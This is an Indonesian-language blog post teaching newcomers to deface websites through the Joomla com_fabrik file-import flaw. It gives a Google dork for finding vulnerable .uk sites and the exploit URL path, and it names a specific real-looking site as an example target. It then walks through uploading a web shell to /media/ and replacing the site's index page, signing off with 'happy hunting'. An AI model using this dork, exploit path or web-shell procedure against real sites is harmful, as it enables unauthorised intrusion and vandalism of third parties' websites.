Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah www.google.com
Masukkan Dorknya tadi
inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?option=com_fabrik&lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi
http://www.case-stores.de/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
seperti gambar di bawah ini :
Upload shell ente atau kalo belom punya bisa ambil dari artikel saya :)
untuk mengetahui letak shell nya di mana
www.target.com/media/namashellkamu.php ( itu kalo nama shell ente shell )
dan jika sukses manggil shell nya akan seperti gambar di bawah ini :
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
kalo udah gitu tinggal tebas index nya dan ganti make scrip kalian deh :D
dan taraaaaaaaa anda telah berhasil mendeface web tersebut :)
Mudah banget kan??? :)
Oke, selamat berburu....
sekian tutor dari ane untuk deface dengan com_fabrik
0 komentar:
Posting Komentar